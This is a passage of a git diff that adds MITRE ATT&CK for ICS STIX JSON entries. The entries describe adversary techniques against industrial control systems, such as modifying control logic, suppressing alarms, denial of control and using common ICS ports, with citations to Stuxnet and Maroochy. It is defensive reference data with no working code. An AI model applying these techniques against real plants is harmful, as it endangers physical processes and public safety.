"attack-pattern", + "id": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0890", + "external_id": "T0890" + }, + { + "source_name": "The MITRE Corporation", + "description": "The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ", + "url": "https://attack.mitre.org/techniques/T1068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061.json new file mode 100644 index 0000000000000000000000000000000000000000..bdaa8bdb3c774d2a8b1423c8e501fadbcf1d45ba --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d5b587a1-5add-4019-bf8b-4135eea22087", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0846", + "external_id": "T0846" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1018" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73.json new file mode 100644 index 0000000000000000000000000000000000000000..5e9377a5bad589d31154db9c2077d544090c0ab5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--60a0c521-6245-4620-84e7-79add7b94d67", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Engineering Workstation Compromise", + "description": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0818", + "external_id": "T0818" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4.json new file mode 100644 index 0000000000000000000000000000000000000000..8bd062b92292c732deb4836ddcb42eda425eb86c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c42a6810-78de-4e58-806f-f927fbb41ed2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Connection Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.\n\nThe definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0884", + "external_id": "T0884" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1090" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387.json new file mode 100644 index 0000000000000000000000000000000000000000..cafeda89898dc5b7890a0d6cce56babcfaa5effc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--f5d36f91-9cfa-404b-a34e-623a4552cb6e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e.json new file mode 100644 index 0000000000000000000000000000000000000000..595f52b41aefc74d6a3e2bb1f9ab5670750cba43 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--baa2fbf2-5614-4b85-93ae-fd651e01b7df", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e0d74479-86d2-465d-bf36-903ebecef43e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21T17:43:26.506Z", + "modified": "2022-05-06T17:47:24.401Z", + "name": "Modify Control Logic", + "description": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. \n\nProgram code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active.\n\nAn adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools.\n\nAn adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. \n\nIt is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the \u201creal\u201d pressure is for given analog signals and then automatically linearize the measurement to what would be the \u201creal\u201d pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be \u201ccorrected\u201d during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. (Citation: Stuxnet - Langner - 201311)\n\nIn the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. (Citation: Maroochy - MITRE - 200808)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0833", + "external_id": "T0833" + }, + { + "source_name": "Stuxnet - Langner - 201311", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + }, + { + "source_name": "Maroochy - MITRE - 200808", + "description": "Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study\u2013 Maroochy Water Services, Australia. Retrieved March 27, 2018.", + "url": "https://www.mitre.org/sites/default/files/pdf/08%201145.pdf" + } + ], + "x_mitre_deprecated": true, + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf.json new file mode 100644 index 0000000000000000000000000000000000000000..ee9dc63f8c2551653faece7ec54c01665ecf9064 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--82f60307-7461-408b-a5ff-a3fee2b6b31e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Remote Services", + "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daisuke Suzuki" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Module: Module Load", + "Network Share: Network Share Access", + "Process: Process Creation", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "created": "2021-04-12T19:26:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0886", + "external_id": "T0886" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0.json new file mode 100644 index 0000000000000000000000000000000000000000..ce7cfcbeb641b46f87636c601e6a9d8267529911 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--b72c047f-1768-4622-bfdf-253abd1e2290", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "I/O Module Discovery", + "description": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0824", + "external_id": "T0824" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20.json new file mode 100644 index 0000000000000000000000000000000000000000..cb3be80979627e2c2c1a60ec517c53dfd04fb5c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--a2d23f8d-0a4a-4f0b-8270-75256d235ddb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:15:14.260Z", + "name": "Denial of Control", + "description": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nIn the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0813", + "external_id": "T0813" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Mark Loveless April 2017", + "description": "Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 2020/11/06 ", + "url": "https://duo.com/decipher/the-dallas-county-siren-hack" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92.json new file mode 100644 index 0000000000000000000000000000000000000000..f1827db0d01590419bfceaca8b5b29399406f481 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--97a2f1d7-e84d-4b11-b011-69b515684193", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:17:43.803Z", + "name": "Modify Alarm Settings", + "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0838", + "external_id": "T0838" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07.json new file mode 100644 index 0000000000000000000000000000000000000000..69dadda481f7e2292dc0774ecf420de0de181be2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--dd61cc75-878b-4708-84fa-b03934ac6db4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Commonly Used Port", + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": 